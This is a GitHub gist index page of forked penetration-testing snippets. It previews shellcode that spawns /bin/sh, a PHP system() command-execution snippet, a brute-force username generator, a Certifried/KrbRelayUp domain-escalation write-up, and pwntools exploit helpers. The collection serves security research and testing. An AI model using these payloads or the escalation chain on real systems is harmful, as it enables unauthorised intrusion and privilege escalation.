Mohin Paramasivam mohinparamasivam

@mohinparamasivam
mohinparamasivam / PatchClean.ps1
Created October 19, 2023 12:21 — forked from hugsy/PatchClean.ps1
PatchExtract.ps1 & PatchClean.ps1 from Greg Linares (all credits to @Laughing_Mantis)
<#
================
PATCHCLEAN.PS1
=================
Version 1.0 Patch Folder Cleaner by Greg Linares (@Laughing_Mantis)
This Tool will go through the patch folders created by PatchExtract.PS1 and look for files created older
than 30 days prior to the current date and move these to a sub folder named "OLD" in the patch folders.
mohinparamasivam / delta_patch.py
Created October 19, 2023 12:21 — forked from wumb0/delta_patch.py
a script for applying MS patch deltas
from ctypes import (windll, wintypes, c_uint64, cast, POINTER, Union, c_ubyte,
                    LittleEndianStructure, byref, c_size_t)
import zlib
# types and flags
DELTA_FLAG_TYPE = c_uint64
DELTA_FLAG_NONE = 0x00000000
DELTA_APPLY_FLAG_ALLOW_PA19 = 0x00000001
<?php
echo system('whoami');
echo system('pwd');
?>
mohinparamasivam / shellcode.c
Created August 29, 2022 01:59 — forked from securitytube/shellcode.c
C Program to test shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
int main()
{
    printf("Shellcode Length: %zu\n", strlen((char *)code));
mohinparamasivam / namemash.py
Created August 19, 2022 00:54 — forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
mohinparamasivam / certifried_with_krbrelayup.md
Created May 18, 2022 07:42 — forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. The combination of these two: a non-privileged domain user escalating to Domain Admin without the requirement of adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

mohinparamasivam / PowerView-3.0-tricks.ps1
Created April 23, 2022 13:47 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
mohinparamasivam / finding_offset.py
Created September 20, 2021 13:00 — forked from 0xswitch/finding_offset.py
Find offset for buffer overflow vulnerability with pwntools
from pwn import *
elf = ELF("./vuln")
p = process("./vuln")
p.sendline(cyclic(200, n=8))
p.wait()
core = p.corefile
mohinparamasivam / FormatStringBugAutopwn
Created July 5, 2021 07:21 — forked from hexnickk/FormatStringBugAutopwn
Format String Bug exploitation with pwntools example
#!/usr/bin/python2.7
import argparse
import re
import pwnlib
def execute_with_payload(binary_name, payload):
    ans = ""
    proc = pwnlib.tubes.process.process(
mohinparamasivam / nessus_merger.py
Created March 24, 2021 02:52 — forked from btoews/merger.py
Merging Nessus Files
# file: merger.py
# based off: http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/
# by: mastahyeti
import xml.etree.ElementTree as etree
import shutil
import os
first = 1
for fileName in os.listdir("."):